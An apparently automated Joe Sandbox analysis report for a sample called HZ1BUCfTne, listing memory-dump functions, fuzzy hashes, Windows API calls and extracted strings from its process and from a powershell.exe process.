Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9090000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID: fff?
API String ID: 0-4136771917
Opcode ID: 687cb8ba9a3df9a82145f97feb4f9fe7b7ad2082e592662a6cc90b283d6c8974
Instruction ID: 83161b73246dcb161ddc198ca79ec4df5476d1882120eca9de5ea3f13b8ff013
Opcode Fuzzy Hash: 687cb8ba9a3df9a82145f97feb4f9fe7b7ad2082e592662a6cc90b283d6c8974
Instruction Fuzzy Hash: EA126B35900619DFCF11CF90C884BD9BBB2FF49300F158595E909AF266E7729A86DF80

Function 09099880 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2393760645.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9090000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94dd7285a4d9e3b76b1e648cc82116a5072cc788005db7a3fab3d214c06a8e70
Instruction ID: 71509a44d768a3f8d9687f032598e7a6a4350725d52562ca0f7e05bf2557adbf
Opcode Fuzzy Hash: 94dd7285a4d9e3b76b1e648cc82116a5072cc788005db7a3fab3d214c06a8e70
Instruction Fuzzy Hash: F0523635A10619CFCB61DF65C844BE9B7F2FF89300F148599E819AB261EB31EA81DF41

Function 0909D6C0 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2393760645.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9090000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20f129b50305b73f5209da5b46730161f0860a6989e31e624eeb716270d5bbb7
Instruction ID: a84b68e4fec1d1ad5b2a7cc23ba5915856825f7c33efe0c6f0230729feba03d4
Opcode Fuzzy Hash: 20f129b50305b73f5209da5b46730161f0860a6989e31e624eeb716270d5bbb7
Instruction Fuzzy Hash: 31322531910619CFCB21DF69C944BD9B7F2FF89300F1589E9E509AB260EB71AA85DF40

Function 06E5D3E8 Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06E5D476
GetCurrentThread.KERNEL32 ref: 06E5D4B3
GetCurrentProcess.KERNEL32 ref: 06E5D4F0
GetCurrentThreadId.KERNEL32 ref: 06E5D549

Memory Dump Source

Source File: 00000000.00000002.2391418901.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e50000_HZ1BUCfTne.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9fc64940d5c14b8148df0ea92c6eba73bc6ac3f070fbb46221f47e8a746fe508
Instruction ID: c78b144f2e212a8c2ce7a40af7b3e5d4d0989023eb24b291b119c483a1c850f9
Opcode Fuzzy Hash: 9fc64940d5c14b8148df0ea92c6eba73bc6ac3f070fbb46221f47e8a746fe508
Instruction Fuzzy Hash: FB5187B09013498FDB54CFAAD848BEEBBF2EF88304F248059E459A73A1C7356945CF65

Function 06E5D3F8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06E5D476
GetCurrentThread.KERNEL32 ref: 06E5D4B3
GetCurrentProcess.KERNEL32 ref: 06E5D4F0
GetCurrentThreadId.KERNEL32 ref: 06E5D549

Memory Dump Source

Source File: 00000000.00000002.2391418901.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e50000_HZ1BUCfTne.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 853dedd75179f987e10dc6eb0b699bcb05de0c536d77c2e8fb2339dbd84ee0f0
Instruction ID: d7db0f41b87b4cbd3e31fd447c8ace41bdcc17efeca0e9984ea84be3b9486be8
Opcode Fuzzy Hash: 853dedd75179f987e10dc6eb0b699bcb05de0c536d77c2e8fb2339dbd84ee0f0
Instruction Fuzzy Hash: 805167B09013098FDB54CFAAD948BEEBBF2EF88304F248019E419A7360D7756945CF69

Function 06E5AD68 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06E5AFBE

Memory Dump Source

Source File: 00000000.00000002.2391418901.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e50000_HZ1BUCfTne.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 57a49ba85cf91bda65fb5556752383fb7a35f10290311d97dca4a72c5bb3a3fa
Instruction ID: 947de6ea6d119fd7c2b5bce701a094e4b564a69326f8fb3ebe754d27a3ee3143
Opcode Fuzzy Hash: 57a49ba85cf91bda65fb5556752383fb7a35f10290311d97dca4a72c5bb3a3fa
Instruction Fuzzy Hash: 41814970A00B058FD7A4DF29D44479ABBF5FF88204F108A2DD99AD7A40DB75E845CF91

Function 06E5590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 06E559C9

Memory Dump Source

Source File: 00000000.00000002.2391418901.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e50000_HZ1BUCfTne.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7ce567ec6a2b22e6ca54be2dfd957641d648ce6a33be40535be43753e1325652
Instruction ID: 036c744455ea08e759130582da52e7de14df27d20d6e3c0c8330d3c100332646
Opcode Fuzzy Hash: 7ce567ec6a2b22e6ca54be2dfd957641d648ce6a33be40535be43753e1325652
Instruction Fuzzy Hash: A041F3B1C00719DFEB24CFA9C884BDDBBB1BF48704F20816AD408AB255D7B55945CF90

Function 06E544D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 06E559C9

Memory Dump Source

Source File: 00000000.00000002.2391418901.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e50000_HZ1BUCfTne.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 173c93f2ceab5a368ec7e69bd5f4dab4631f6414c8cbbb5b2a516b26f759cb1a
Instruction ID: d409aa81a1623fb0254e6caa76bd8b7b76543f4d168f70394deea8f44f1dec1c
Opcode Fuzzy Hash: 173c93f2ceab5a368ec7e69bd5f4dab4631f6414c8cbbb5b2a516b26f759cb1a
Instruction Fuzzy Hash: 3041D2B1C00719DBEB24CFA9C884BDDBBB5BF48304F20806AD809AB255DBB56945CF90

Function 090971E8 Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0909831D,?,?), ref: 090983CF

Memory Dump Source

Source File: 00000000.00000002.2393760645.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9090000_HZ1BUCfTne.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 53f3ebbe6ea8fbdd9c2dab584659b0aa005a0f69f99c79218edb273b9749d0e7
Instruction ID: 7dd6b25a70a8e14af0e48f920163669b5e0446a373c9198fc67e9012a03b1c54
Opcode Fuzzy Hash: 53f3ebbe6ea8fbdd9c2dab584659b0aa005a0f69f99c79218edb273b9749d0e7
Instruction Fuzzy Hash: E331E2B59013099FDB10CF9AD884AEEFBF5EF49310F14842AE819A7310D374A944DFA0

Function 090971F4 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0909831D,?,?), ref: 090983CF

Memory Dump Source

Source File: 00000000.00000002.2393760645.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9090000_HZ1BUCfTne.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 54d24a39ae397ce1b1174134850c8afc98d9128b5f2c72232bf8395940f089de
Instruction ID: 520cfb5bbb695b7534a0e95aea32ba706f836fafea2c806fcbe82995dcddf150
Opcode Fuzzy Hash: 54d24a39ae397ce1b1174134850c8afc98d9128b5f2c72232bf8395940f089de
Instruction Fuzzy Hash: E531E0B59003099FDB10CF9AD884AEEFBF5FB48320F14842AE819A7310D374A944DFA0

Function 09098330 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0909831D,?,?), ref: 090983CF

Memory Dump Source

Source File: 00000000.00000002.2393760645.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9090000_HZ1BUCfTne.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: b850c1601dba45b132ed8a2c279bf691c88ae42545ccb5a70d9019caa1db7aa1
Instruction ID: 333f28bd3d4d0024ccea9b394569658b4e600b8c420dfcd3df935d7dd809f467
Opcode Fuzzy Hash: b850c1601dba45b132ed8a2c279bf691c88ae42545ccb5a70d9019caa1db7aa1
Instruction Fuzzy Hash: E131B1B59002099FDB14CF9AD8846EEBBF5FB58310F14842AE819A7310D375A945CFA4

Function 06E5D639 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06E5D6C7

Memory Dump Source

Source File: 00000000.00000002.2391418901.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e50000_HZ1BUCfTne.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5b39615165c0fff28e5fc499204b51fde85c2c1eedc3a004b6cca734137adbe2
Instruction ID: 4e4fc12fa417a474289326cc95c7f0e15111bbf7d7a12e532fb77d8571a5848c
Opcode Fuzzy Hash: 5b39615165c0fff28e5fc499204b51fde85c2c1eedc3a004b6cca734137adbe2
Instruction Fuzzy Hash: EE21E3B5D00349AFDB10CFAAD984AEEBBF5EB48310F14841AE918B3350C375A940CF64

Function 06E5D640 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06E5D6C7

Memory Dump Source

Source File: 00000000.00000002.2391418901.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e50000_HZ1BUCfTne.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 859ab6b4a363e6c93096bfa893781f600533d67f1443ef1a3ef7730dc42ea218
Instruction ID: 78692fe6c3d5aab7deb3e311c8cc74bf7e09b099dc11a6f4818daac8d7bea83b
Opcode Fuzzy Hash: 859ab6b4a363e6c93096bfa893781f600533d67f1443ef1a3ef7730dc42ea218
Instruction Fuzzy Hash: 1521C2B5D00349AFDB10CFAAD984ADEBBF9EB48310F14841AE918A7350D375A944CFA5

Function 06E5AF58 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06E5AFBE

Memory Dump Source

Source File: 00000000.00000002.2391418901.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e50000_HZ1BUCfTne.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2521298305003c0f5b3ac7282f6e564123d5d07373c4e901f2b7c26244016cef
Instruction ID: 8c1b829a4ab25268bbaafb25d4090425561ac779d3ffd33261378115434568e7
Opcode Fuzzy Hash: 2521298305003c0f5b3ac7282f6e564123d5d07373c4e901f2b7c26244016cef
Instruction Fuzzy Hash: 051110B6C003498FDB20CF9AD444BDEFBF4EB88214F25852AD829A7604C379A545CFA1

Function 0527D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390565707.000000000527D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0527D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_527d000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 451d8d3189676dd65aa839d57975c37e113c228015f3102fad7337a043576390
Instruction ID: a4aa73e8d87255d359571f2ad56a8bd1872521ac634b3e554566a77b2769519d
Opcode Fuzzy Hash: 451d8d3189676dd65aa839d57975c37e113c228015f3102fad7337a043576390
Instruction Fuzzy Hash: 792125B6514249DFDB05DF10D9C0F26BB66FF88324F24C169E90A0F256C376E456CAA2

Function 054AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390818985.00000000054AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 054AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54ad000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 967c0e55cd0d42932815801e445b55a5fe30b186e20374499dfc463d291471fb
Instruction ID: a2b90d3f1861ce59357144f0fe5852640dba65cf08fb053ac6457822dff4a1b7
Opcode Fuzzy Hash: 967c0e55cd0d42932815801e445b55a5fe30b186e20374499dfc463d291471fb
Instruction Fuzzy Hash: F8212572908300DFDB54DF10D980B66BBA2FB94318F64C5AED80A4B746C336D447CA61

Function 054AD2D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390818985.00000000054AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 054AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54ad000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2664c7aa433fb240779771410bd4d38e7e2d52d45e42de3c5653ec845cdc396
Instruction ID: 0bc26eebc66a3b73a7b15bb26a0ad322d198a53d9f8b3147134e11b3d87f9332
Opcode Fuzzy Hash: d2664c7aa433fb240779771410bd4d38e7e2d52d45e42de3c5653ec845cdc396
Instruction Fuzzy Hash: 012129B7904244DFDB44DF10D4C0B6ABB66FB94310F24C5AAD80A4BB46C33AD446CB61

Function 054AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390818985.00000000054AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 054AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54ad000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d8a643c8328e639f3eb1c58e001cd1d7d98c5ce119c7ee88addddb6b4c84be
Instruction ID: 36007603ed821c2c55a53706a27c76b92eec3d85c18d9d884b3ee3da98ff21d4
Opcode Fuzzy Hash: 97d8a643c8328e639f3eb1c58e001cd1d7d98c5ce119c7ee88addddb6b4c84be
Instruction Fuzzy Hash: 802125B3904200DFDB49DF10C9C0F66BBA2FB94314F24C5AED80A4B752D336D846CA61

Function 054AD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390818985.00000000054AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 054AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54ad000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42b981f778bb75f8790968bb110b0ad843f6d3e8c906bf512a3e4faa28ea452b
Instruction ID: 387704930f25783fa1fd82562a9562970964708254b8b8329d258fdb43917b64
Opcode Fuzzy Hash: 42b981f778bb75f8790968bb110b0ad843f6d3e8c906bf512a3e4faa28ea452b
Instruction Fuzzy Hash: 6D2180765083809FCB06CF14D994B12BF71FB45214F28C5EAD8498F696C33A9806CB62

Function 0527D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390565707.000000000527D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0527D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_527d000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction ID: d111bee75bdeb19b58ef03883c681c07f925786896c753b5f5345bf0342180ca
Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction Fuzzy Hash: B0119D76504285DFDB16CF10D5C4B26BF72FF84224F2486A9D8490E656C33AE456CBA1

Function 054AD2CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390818985.00000000054AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 054AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54ad000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f73ed92b59b8f5d5057bc2053e5f8659ab4069548d40049fc97eec44a11b2c
Instruction ID: 3ccd43ba2a5db30ffbc4c412e59948f1928e74512eeb7458b3c9d001fe34bdf3
Opcode Fuzzy Hash: c0f73ed92b59b8f5d5057bc2053e5f8659ab4069548d40049fc97eec44a11b2c
Instruction Fuzzy Hash: C011B676504240DFDB11CF10D5C4B5AFB72FB84314F24C6AAD8494BB56C33AD406CB51

Function 054AD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390818985.00000000054AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 054AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54ad000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: dac7c7a9550fced02b8318f456099b22a30fd6ac9cf7bfdd17bee82c5c8bcc82
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: 5511BE76904240DFCB16CF10C5C4B66BB72FB84214F24C6AAD8494B766C33AD40ACB51

Function 0527D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390565707.000000000527D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0527D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_527d000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4addc661f852556f4e0db45e9d22cef63e1c00ca443ff705802cb255a8fe763c
Instruction ID: 854f621979c73ff9fceea8c2e1171b9b6343793eb9d9ffaf3cfa0b74a4301fe8
Opcode Fuzzy Hash: 4addc661f852556f4e0db45e9d22cef63e1c00ca443ff705802cb255a8fe763c
Instruction Fuzzy Hash: 0B012B710183489BE720CF15CDC4B76BB98EF82234F18C59AED0A0F286D6799840CAF1

Function 0527D6CF Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390565707.000000000527D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0527D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_527d000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 261017c9018367f19aeea4f5f27788d6ffb8e4d93db4f5b9a5692f62368b3244
Instruction ID: fd96db88c5e898c7a524c898ce6984594955640215dd96e7ada118021304fc7e
Opcode Fuzzy Hash: 261017c9018367f19aeea4f5f27788d6ffb8e4d93db4f5b9a5692f62368b3244
Instruction Fuzzy Hash: DCF0F9B6600604AF9720CF0AD884C27FBADEFC5670719C59AE85A5B756C672FC41CEA0

Function 0527D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390565707.000000000527D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0527D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_527d000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36ce96e243aa5af5efe68bfdb713567c19fe1967ce422c79ecf45804c2c9a067
Instruction ID: 6bb53f0e367b9d7025e4f8e1975f33d358c14a7575885ec871e84348eea81d9b
Opcode Fuzzy Hash: 36ce96e243aa5af5efe68bfdb713567c19fe1967ce422c79ecf45804c2c9a067
Instruction Fuzzy Hash: 89F04F72408244AEE720CF15DD84B66FB98EF81624F18C45AED495A296C6799844CAB1

Function 0527D6C0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2390565707.000000000527D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0527D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_527d000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56a48efdcf2bd711e7a427eee33026371565b9c8bea7d7665980853128f8d260
Instruction ID: 8564874fb2e8d53381f962911a6de22136c774dcede210098de72459b8ad9311
Opcode Fuzzy Hash: 56a48efdcf2bd711e7a427eee33026371565b9c8bea7d7665980853128f8d260
Instruction Fuzzy Hash: B2F03C75104680AFD325CF05C884C22BFB9EF866607198489E89A5B766C671FC42CB60

Non-executed Functions

Function 090920B8 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

, xrefs: 09092154

Memory Dump Source

Source File: 00000000.00000002.2393760645.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9090000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: fe06536c1fdc9580c6b359df84f754b349231811e81ecb2371af5e47bb7f4e23
Instruction ID: e379022094310e26096a60ea8c1221d9f05d0150ace9a279d9e0288c72c1281d
Opcode Fuzzy Hash: fe06536c1fdc9580c6b359df84f754b349231811e81ecb2371af5e47bb7f4e23
Instruction Fuzzy Hash: AC917F71F10219AFDF54DF69C8446AFBAF6EF88710F108829E415EB250DB359905DBA0

Function 06E5D324 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2391418901.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e50000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81826427945f01409388959828a0321abb7999368fb5d268a0b1bdcc2d2cbec9
Instruction ID: 1e56dd6f59efc13108972361e8364f15423572ed1e1aef493ab3f52e0ea64f71
Opcode Fuzzy Hash: 81826427945f01409388959828a0321abb7999368fb5d268a0b1bdcc2d2cbec9
Instruction Fuzzy Hash: 07A17C32E10305CFCF45DFA5C88059EB7B6FF85304B16956AE912AB265EB71E905CF40

Analysis Process: powershell.exePID: 8152, Parent PID: 7796COMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 02EBB748 Relevance: 9.0, Strings: 7, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SZ7p^, xrefs: 02EBB7F9
{R7p^, xrefs: 02EBB9D0, 02EBB9D5
3Z7p^, xrefs: 02EBB875
kR7p^, xrefs: 02EBBA08, 02EBBA0D
CZ7p^, xrefs: 02EBB837
cZ7p^, xrefs: 02EBB7AC
[R7p^, xrefs: 02EBBA40, 02EBBA45

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID: 3Z7p^$CZ7p^$SZ7p^$[R7p^$cZ7p^$kR7p^${R7p^
API String ID: 0-425089007
Opcode ID: 36a0319bfb58ebe72289a86a5b3ab8df7b36bae49e5bef8eb6ccc81c40f618bc
Instruction ID: 3cc2dd504f23c485df3d96b855810e29fb03f75910e36ba6539650c75be3d2d3
Opcode Fuzzy Hash: 36a0319bfb58ebe72289a86a5b3ab8df7b36bae49e5bef8eb6ccc81c40f618bc
Instruction Fuzzy Hash: 46918CB1B406145FDB16EFB988116AF7BA3EF84700B4089ADD016AB340DF746E058FE6

Function 02EBB770 Relevance: 9.0, Strings: 7, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SZ7p^, xrefs: 02EBB7F9
{R7p^, xrefs: 02EBB9D0, 02EBB9D5
3Z7p^, xrefs: 02EBB875
kR7p^, xrefs: 02EBBA08, 02EBBA0D
CZ7p^, xrefs: 02EBB837
cZ7p^, xrefs: 02EBB7AC
[R7p^, xrefs: 02EBBA40, 02EBBA45

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID: 3Z7p^$CZ7p^$SZ7p^$[R7p^$cZ7p^$kR7p^${R7p^
API String ID: 0-425089007
Opcode ID: d7869bc372366147bd578140143e463efd51187e49d9d8e6dc10439192a694d1
Instruction ID: 0adb7f3a7821535d133d7779270e20cfecd100c6c87ff1b78c5f6b0e13455a80
Opcode Fuzzy Hash: d7869bc372366147bd578140143e463efd51187e49d9d8e6dc10439192a694d1
Instruction Fuzzy Hash: AE916B71B406185FDB16EFB988116AFBBA3EF84700B40896DD516AB340DF746E018FE6

Function 07302308 Relevance: 14.7, Strings: 11, Instructions: 912COMMON

Download Yara Rule

Strings

JKl, xrefs: 0730259E
#:k, xrefs: 07302BA7
@l, xrefs: 07302D9D
JKl, xrefs: 073023D1
JKl, xrefs: 073025EA
@l, xrefs: 07302D8F
JKl, xrefs: 073025F6
JKl, xrefs: 0730237F
JKl, xrefs: 073023C5
rJl, xrefs: 0730254F
rJl, xrefs: 07302559

Memory Dump Source

Source File: 00000003.00000002.1538168919.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: #:k$JKl$JKl$JKl$JKl$JKl$JKl$rJl$rJl$@l$@l
API String ID: 0-279820513
Opcode ID: 5fc1e331adf78d460c534bf369aedfe6828f236382f089ecdd2d11c5542157ef
Instruction ID: 2fa9274e3c26af0fef5ef1ee76a77d584acdcdd153358c732350fe94b8f413f3
Opcode Fuzzy Hash: 5fc1e331adf78d460c534bf369aedfe6828f236382f089ecdd2d11c5542157ef
Instruction Fuzzy Hash: 596239F17043168FEB158F688468BABBBF5BF86210F1480AAD849DB691DB35CC41C7E1

Function 02EBB008 Relevance: 2.6, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3]7p^, xrefs: 02EBB0D7, 02EBB0DC
#]7p^, xrefs: 02EBB10F, 02EBB114

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID: #]7p^$3]7p^
API String ID: 0-4116888563
Opcode ID: d1963f100e4c5c1446c038dd6c22e239ae048ab59138591e76363225ec65712e
Instruction ID: a754db0cbbead9486d9fbb81868f0a97a9924d1691f8aabd417fc5e2acb0aef1
Opcode Fuzzy Hash: d1963f100e4c5c1446c038dd6c22e239ae048ab59138591e76363225ec65712e
Instruction Fuzzy Hash: E7319CB4E402089FDB41EFA4D854AAE7BB7EF85300F1184B9D115AB391CE38AD01CFA1

Function 02EBB018 Relevance: 2.6, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

